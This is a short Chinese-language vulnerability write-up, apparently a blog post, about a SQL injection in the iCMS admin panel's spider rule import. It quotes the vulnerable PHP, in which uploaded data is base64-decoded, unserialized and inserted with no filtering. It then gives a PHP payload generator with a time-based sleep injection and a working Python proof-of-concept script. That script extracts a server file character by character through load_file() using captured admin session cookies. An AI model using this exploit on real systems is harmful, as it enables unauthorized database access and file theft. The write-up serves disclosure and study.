后台注入一枚

漏洞产生点在后台的

看代码spider.admincp.php第464行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
public function do_import_rule() {
files::$check_data = false;
files::$cloud_enable = false;
iFS::$config['allow_ext'] = 'txt';
$F = iFS::upload('upfile');
$path = $F['RootPath'];
if ($path) {
$data = file_get_contents($path);
if ($data) {
$data = base64_decode($data);
$data = unserialize($data);
iDB::insert("spider_rule", $data);
}
@unlink($path);
iUI::success('规则导入完成', 'js:1');
}
}

可以看到它这里将上传的规则先base64解码,然后反序列化之后代入IDB::insert

看一下insert

1
2
3
4
5
public static function insert($table, $data,$IGNORE=false) {
$fields = array_keys($data);
self::query("INSERT ".($IGNORE?'IGNORE':'')." INTO ".iPHP_DB_PREFIX_TAG."{$table} (`" . implode('`,`',$fields) . "`) VALUES ('".implode("','",$data)."')");
return self::$insert_id;
}

没有了任何过滤,构造payload

1
2
3
<?php
$data = array("rule"=>"p0desta'or if(1,sleep(5),1))#");
echo(base64_encode(serialize($data)));

如果有权限的话我们可以利用注入来实现文件读取,编写了poc如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
import requests
import time
import base64
burp0_url = "http://www.test.com:80/icms/admincp.php?app=spider&do=import_rule&frame=iPHP&CSRF_TOKEN=e10bf76a04f509d4fecbe3d9a9019015e21f12bd"
burp0_cookies = {"iCMS_apps_tab": "apps-type-1", "PHPSESSID": "hklte5he8o90kmmcmep2986jf7", "iCMS_iCMS_AUTH": "a2bab484wFGE7nGTjwffi_SYNVY9ZFggA3JUMGaO1_Ht2uptiqTvhEdCY7b5NHj1gElIXJsgys_WSXLIR7TBZbQInHANWku0zmbXD2GV2NDqB2eIjrKkgK_L2g", "iCMS_article_category_tabs": "tree", "iCMS_USER_AUTH": "dc043aa07gOqcLfWTuJoLSCrKIkbJNa8SPGk1VUKhacikJl4JxbrK2aBNBbk0bbmKnQwweqtz7vvJ93P2lLGBzezHER9aEK_HMs0_39QpgM5hSdhCCNxDv8Lwtx1RRqZEVpWUZBwAjJe9476soMuCC6-gJ1e_mfMMhYSA8ioWG1OUFUvUW07tVg5F0RUP2oamPz91F-t85bDNOEnubfHpxzFMND3EABDYJN0o1HfVweojEDYaxs-l6VEiuc0fFUlm-MIZXnd5xe1h6std5cCRwRCS_H71q-oTNO3NbuyojT9HVlCafwxmz7BTlmfIRHeADx7DImb_UyY_daATbgMffPsEHs4KApMstm9pbT4D53E8YbyCAnCDog4MQ7tV3snwpSRufPJCdeY3fkJUFyDhfbqTiJXEAxAcOWCoxGwLXWPI-Ns9Tyjh4WJChqpy0_gwa3JSszGZOQZaAf86KqeDKdct-YSE2UN6qwRVvUeOijMZrdzPxaqt_1OzlhDeBPlM4UW4xQMh7VQ3q5TcfpIHclZWiAspuU8Ynnj3XEwAo8", "iCMS_userid": "b8423c8bm9SnzUz782Y6XmtRdU1dTR3CL9iqL-Iv83vI7htnIg", "iCMS_nickname": "c3bc646dcSTyka3txmYpDcMW2sUPNhaunl7kIzv0Nf_89GTeIZNk", "iCMS_captcha": "0d9585a2vvMO_fVbJRXMR3w48z84hOnLN7JFLRTPC-BzbX7T"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------21119269733568", "Referer": "http://www.test.com/fiyocms/", "Connection": "keep-alive", "Upgrade-Insecure-Requests": "1"}
result = ''
for i in range(1,5):
for j in range(97,123):
p = "p0desta'or if((select ascii(substr((select load_file('E://p0desta.txt')),{0},1))={1}),sleep(5),1))#".format(i,j)
payload = 'a:1:{s:4:"rule";s:'+str(len(p))+':"'+p+'";}'
burp0_data="-----------------------------21119269733568\r\nContent-Disposition: form-data; name=\"upfile\"; filename=\"1.txt\"\r\nContent-Type: text/plain\r\n\r\n{0}\r\n-----------------------------21119269733568--\r\n".format(base64.b64encode(payload))
start_time = time.time()
content = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
end_time = time.time()
if end_time - start_time >= 5:
result += chr(j)
print result
break
print result